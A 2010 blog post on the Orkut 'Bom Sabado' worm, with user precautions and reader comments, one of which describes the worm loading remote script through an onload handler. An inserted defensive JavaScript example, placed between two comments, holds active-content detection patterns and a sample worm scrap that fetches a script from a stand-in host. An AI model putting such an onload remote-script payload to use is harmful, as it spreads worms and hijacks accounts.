Sunday, September 26, 2010

To Orkut or not to Orkut: Lessons from 'Bom Sabado'

The Internet has added several verbs to the English language. If you don't believe me, just 'google' it. 'Googling' and 'Orkutting' belong to this new clan of verbs. For those who don't know what Orkut is, let me tell them that it is a social networking site owned by Google Inc., and for those who were hibernating even deeper, social networking is a form of net-friendship for people. I have been on Orkut (maintaining an Orkut account) for the past 3 years or so and have experienced all the good and bad effects of being on it. Among the good parts is the fact that Orkut lets me remain connected with so many friends, family members and acquaintances -- not all of the people I am connected to, but the ones who check their accounts regularly and care to respond -- send a broadcast by way of status messages, and share a few pictures with them. There are other uses of Orkut too, but I use it just for these three.

A couple of days back, I received a couple of scraps (small messages, mostly visible to all my friends and me) in my scrapbook. The messages read 'Bom Sabado'. I could not make head or tail of it because this was definitely not Hindi, English or German. It didn't sound like Chinese, Japanese, Korean, Arabic or Persian either. It looked European to me. I 'googled' it and found out that 'Bom Sabado' means 'Good Saturday' in Portuguese.
I also came to know that this scrap was the result of a new worm (a kind of virus) attack that infested some Orkut accounts and sent 'Bom Sabado' as a message to all the persons listed as friends of the affected account. The worm originated in Brazil. Incidentally, Indians and Brazilians form the biggest demographic groups on Orkut. The worm used a small vulnerability in the browsers of the compromised Orkut accounts to get the encrypted password from the cookie file and use it for itself.
Mostly the systems infected were the ones that were online when this worm spread and attacked. People who replied to this scrap also had some vague Brazilian communities added to their accounts, ended up infected and started sending the scraps themselves. There were also reports of accounts being rendered inaccessible, of the 'Bom Sabado' scraps not being deletable and of scrapbooks not opening. I was fortunate that although I received two such scraps, my account was not infected, because I took some timely measures.

By now, Google has taken care of the worm and stopped its spread. It is also trying to restore the infected systems. However, Google strongly recommended that users clear their browser cache of any saved passwords, cookies and temp files, and change both their account password and their security question.
Wait a second! Google asked me to change my password and my security question too??? Now, an Orkut account is always connected to a Google account, which most people open along with an email account. Later they start writing a blog, sharing pictures through Picasa, buzzing away, using a calendar for their schedules, and several other Google online services, again using the same account details, i.e., the same username and password!
So I effectively had to change the password for all Google services, though just once and at a single place. But doesn't this mean that if my account details and password could be obtained from Orkut, or through some vulnerability in the browser, all my Google accounts are vulnerable to such attacks and could be compromised?

This 'Bom Sabado' episode taught me a few lessons that I would like to share with all of you.

1. Don't keep yourself logged into Orkut (or any site, for that matter) when you don't need it and when you are not using it.

2. If possible, maintain a separate account (separate from your regular email account) for Orkut. This could mean creating a new account, adding your friends again and deleting your old account. Else, create a new email account for yourself. It would be a pain, but still do it if you want to be safe.
This could be tough, but you need to do it, because if something like the 'Bom Sabado' attack is possible, everything connected to your Google identity could be compromised and is at stake. So be sure to isolate things before something like 'Bom Sabado', or a better version of such an attack, threatens your main email account (if in Gmail) and all connected Google accounts like Picasa, Reader, Buzz, Calendar, Voice, SketchUp etc.

3. Set up your Orkut account to send you an email whenever someone scraps you. You would get the content of the scrap in your email without even logging into your Orkut account. When you see something strange like 'Bom Sabado' in an unfamiliar language, think about whether the friend who scrapped you would know this language, or whether it makes sense to both of you. If not, and if you see multiple emails informing you of the same scrap content, google it immediately (I did this when I saw two scraps with 'Bom Sabado') and find out what is going on. Mostly you would learn about such attacks, along with advice on what to do, on the Net itself.

4. Don't log into Orkut if something like this happens. Be sure to clear your browser cache of all history, auto-complete entries, saved passwords, cookies and temp files. Change your password and security question too.

5. Still don't log in. Stay off Orkut until things are taken care of by Google. When you read on the Net that it is over, log back in.

Let's hope such basic precautions will suffice, at least for a while, and that Google will be more robust and less prone to such attacks in future! Amen!!

3 comments:

  1. Wow Amitabh Bhaiya, great post. Thanks for sharing.
    In this digital age, I believe "Prevention is better than cure" is the most apt proverb.

  2. Sir I have some more information...

    The new version of Orkut is found to be affected by a MASS SPREADING WORM. The worm's analysis says that it's just a mass-spreading worm which uses your scrapbook to spread and makes you join a few communities. The worm writer bypassed the script restrictions on Orkut.

    JavaScript code which is hosted on tptools.com is called via an onload function and executed; this happens when you log in and reach your Orkut home page, as your new scraps are updated on your home page, or when visiting your scrapbook triggers the execution of the code.

    The worm is programmed to send a copy of itself to everyone in your friend list via scrap and make you join a few communities.

    And there would not be much harm as of now, and I don't think you need to change your password and all.

    Still I am not aware of the actual payload of the worm.
    As soon as the payload analysis is done, this will be updated.

    (Note: Analysis is done by fb1h2s.)

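As an added example (not code from the post, from the commenter, or from Orkut), here is how a scrapbook renderer could neutralise a scrap carrying active content of the kind described in the comment above: escape the scrap text before it reaches the page, and hold back scraps that carry script-like markup. The function names, the sample scraps and the worm.example URL are the example's own.

```javascript
// Added example, not from the post or from Orkut: two defensive steps a
// scrapbook renderer can take against a self-propagating scrap like the one
// described above (script pulled in through an onload handler when the
// scrapbook is displayed). Names and the sample URL are the example's own.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Step 1: encode the five characters that let text break out of an HTML text
// node or attribute value, so a scrap is shown as text, never parsed as markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Step 2: heuristic detector for scraps that carry active content: a script
// tag, an inline event handler (onload, onerror, ...) or a javascript: URL.
// Ordinary text can occasionally trip it, so flagged scraps are held for
// review and logged rather than silently dropped.
const ACTIVE_CONTENT = [/<\s*script\b/i, /\bon[a-z]+\s*=/i, /javascript\s*:/i];

function looksLikeWormScrap(text) {
  return ACTIVE_CONTENT.some((re) => re.test(String(text)));
}

// Build one scrapbook entry. Both untrusted fields are escaped; a scrap that
// trips the detector is replaced by a notice and returned with flagged=true so
// the caller can log it and warn the sender that their account may be infected.
function renderScrap(sender, text) {
  const flagged = looksLikeWormScrap(text);
  const body = flagged
    ? "[scrap withheld: contains active content]"
    : escapeHtml(text);
  return {
    flagged,
    html: `<div class="scrap"><b>${escapeHtml(sender)}</b>: ${body}</div>`,
  };
}

// Constructed sample scraps: the harmless greeting itself, and a scrap shaped
// like the outbreak (an image tag whose onload handler would fetch a remote
// script; worm.example is a placeholder and nothing is fetched here).
const SAMPLES = {
  benign: "Bom Sabado",
  worm: '<img src="x" onload="load(\'http://worm.example/w.js\')">',
};

// Demo when run directly: node scrap_render.js
console.log(renderScrap("Ana", SAMPLES.benign));
console.log(renderScrap("Ana", SAMPLES.worm));
```

Escaping alone is what stops the injected markup from executing; the detector only adds a log trail so an outbreak like this one is noticed while it is still small.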
  3. Thanks Abhinna and Subrat. Thanks for adding, Subrat. That's a security expert talking, I know.
